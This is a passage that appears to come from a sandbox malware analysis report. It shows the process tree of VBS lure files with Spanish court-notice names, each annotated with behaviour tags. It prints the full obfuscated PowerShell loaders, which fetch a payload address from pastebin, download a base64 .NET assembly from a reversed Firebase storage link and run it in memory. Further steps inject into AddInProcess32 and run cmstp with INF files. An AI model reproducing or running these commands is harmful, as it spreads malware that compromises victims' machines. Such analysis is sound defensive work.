☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GI☆OQ☆1☆DY☆MQ☆3☆GQ☆MgBm☆GE☆Mw☆t☆Dk☆Zg☆0☆GI☆LQ☆w☆DE☆Yg☆0☆C0☆ZQ☆3☆DE☆Yw☆t☆Dc☆MwBk☆Dg☆M☆Bl☆DY☆Zg☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆OQ☆w☆C0☆O☆☆x☆G4☆eQBz☆GE☆LwBv☆C8☆bQBv☆GM☆LgB0☆G8☆c☆Bz☆H☆☆c☆Bh☆C4☆YwBv☆GQ☆LQBl☆HI☆YgBt☆GU☆aQB2☆G8☆bg☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆GU☆awBo☆HU☆a☆☆g☆Cw☆I☆☆n☆H☆☆dgBk☆GE☆cw☆n☆Cw☆I☆☆k☆G4☆YQBs☆GU☆bQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs');powershell $KByHL;9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nalem = '0';$ekhuh = 'C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $irdkt = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($irdkt).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0b95617d2fa3-9f4b-01b4-e71c-73d80e6f=nekot&aidem=tla?txt.4202-90-81nysa/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $ekhuh , 'pvdas', $nalem, '1', 'Roda' ));"10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6024 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3784 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f12⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4248
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\kfgsxdbc.inf12⤵
- System Location Discovery: System Language Discovery
PID:5852
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f12⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\4ias0hcg.inf12⤵
- System Location Discovery: System Language Discovery
PID:5520
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f12⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3580
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\kipuvain.inf12⤵
- System Location Discovery: System Language Discovery
PID:1032
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"' & exit6⤵
- System Location Discovery: System Language Discovery
PID:5276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5220 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bm☆HE☆dgBk☆HI☆I☆☆9☆C☆☆Jw☆w☆DM☆Jw☆7☆CQ☆d☆Bp☆G8☆dQBw☆C☆☆PQ☆g☆Cc☆JQBw☆Ho☆QQBj☆E8☆ZwBJ☆G4☆TQBy☆CU☆Jw☆7☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBy☆HY☆aQBj☆GU☆U☆Bv☆Gk☆bgB0☆E0☆YQBu☆GE☆ZwBl☆HI☆XQ☆6☆Do☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆☆g☆D0☆I☆Bb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆YwB1☆HI☆aQB0☆Hk☆U☆By☆G8☆d☆Bv☆GM☆bwBs☆FQ☆eQBw☆GU☆XQ☆6☆Do☆V☆Bs☆HM☆MQ☆y☆Ds☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆9☆C☆☆JwBo☆HQ☆d☆Bw☆HM☆Og☆v☆C8☆c☆Bh☆HM☆d☆Bl☆GI☆aQBu☆C4☆YwBv☆G0☆LwBy☆GE☆dw☆v☆EE☆Z☆B2☆Dk☆ZwBC☆Eg☆YQ☆n☆Ds☆J☆BJ☆Eg☆c☆BM☆HE☆I☆☆9☆C☆☆K☆BO☆GU☆dw☆t☆E8☆YgBq☆GU☆YwB0☆C☆☆TgBl☆HQ☆LgBX☆GU☆YgBD☆Gw☆aQBl☆G4☆d☆☆p☆C4☆R☆Bv☆Hc☆bgBs☆G8☆YQBk☆FM☆d☆By☆Gk☆bgBn☆Cg☆I☆☆k☆F☆☆e☆BF☆Ew☆W☆☆g☆C☆☆KQ☆7☆CQ☆UgBD☆Gs☆VgBK☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BJ☆Eg☆c☆BM☆HE☆I☆☆p☆C4☆cgBl☆H☆☆b☆Bh☆GM☆ZQ☆o☆Cc☆J☆☆l☆Cc☆L☆☆n☆EE☆Jw☆p☆Ds☆WwBC☆Hk☆d☆Bl☆Fs☆XQBd☆C☆☆J☆Bl☆G4☆YgB4☆Go☆I☆☆9☆C☆☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EM☆bwBu☆HY☆ZQBy☆HQ☆XQ☆6☆Do☆RgBy☆G8☆bQBC☆GE☆cwBl☆DY☆N☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BS☆EM☆awBW☆Eo☆I☆☆p☆Ds☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EE☆c☆Bw☆EQ☆bwBt☆GE☆aQBu☆F0☆Og☆6☆EM☆dQBy☆HI☆ZQBu☆HQ☆R☆Bv☆G0☆YQBp☆G4☆LgBM☆G8☆YQBk☆Cg☆J☆Bl☆G4☆YgB4☆Go☆KQ☆u☆Ec☆ZQB0☆FQ☆eQBw☆GU☆K☆☆n☆FQ☆ZQBo☆HU☆b☆Bj☆Gg☆ZQBz☆Fg☆e☆BY☆Hg☆e☆☆u☆EM☆b☆Bh☆HM☆cw☆x☆Cc☆KQ☆u☆Ec☆ZQB0☆E0☆ZQB0☆Gg☆bwBk☆Cg☆JwBN☆HM☆cQBC☆Ek☆YgBZ☆Cc☆KQ☆u☆Ek☆bgB2☆G8☆awBl☆Cg☆J☆Bu☆HU☆b☆Bs☆Cw☆I☆Bb☆G8☆YgBq☆GU☆YwB0☆Fs☆XQBd☆C☆☆K☆☆n☆GM☆ZQ☆0☆DY☆OQ☆x☆DQ☆Zg☆1☆DI☆Mw☆0☆C0☆N☆☆y☆GY☆O☆☆t☆DQ☆ZQ☆4☆DQ☆LQ☆4☆DE☆ZQ☆z☆C0☆Nw☆4☆GU☆ZQ☆1☆Dg☆Z☆Bl☆D0☆bgBl☆Gs☆bwB0☆CY☆YQBp☆GQ☆ZQBt☆D0☆d☆Bs☆GE☆PwB0☆Hg☆d☆☆u☆G8☆d☆Bz☆G8☆ZwBh☆Gw☆dQB6☆GE☆LwBv☆C8☆bQBv☆GM☆LgB0☆G8☆c☆Bz☆H☆☆c☆Bh☆C4☆bwBj☆Gk☆bgBv☆HI☆d☆Bj☆GU☆b☆Bl☆C0☆bwB0☆G4☆ZQBt☆HU☆YwBv☆GQ☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B0☆Gk☆bwB1☆H☆☆I☆☆s☆C☆☆JwBf☆F8☆XwBf☆GI☆agB3☆HE☆b☆Bf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bm☆HE☆dgBk☆HI☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs');powershell $KByHL;9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$fqvdr = '03';$tioup = 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $enbxj = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($enbxj).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ce46914f5234-42f8-4e84-81e3-78ee58de=nekot&aidem=tla?txt.otsogaluza/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $tioup , '____bjwql________________________________________-------', $fqvdr, '1', 'Roda' ));"10⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5288
-
-
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5864 /prefetch:22⤵PID:3208
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2180
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2840
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5364
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:5716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5920 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6068
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:5144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5280 -
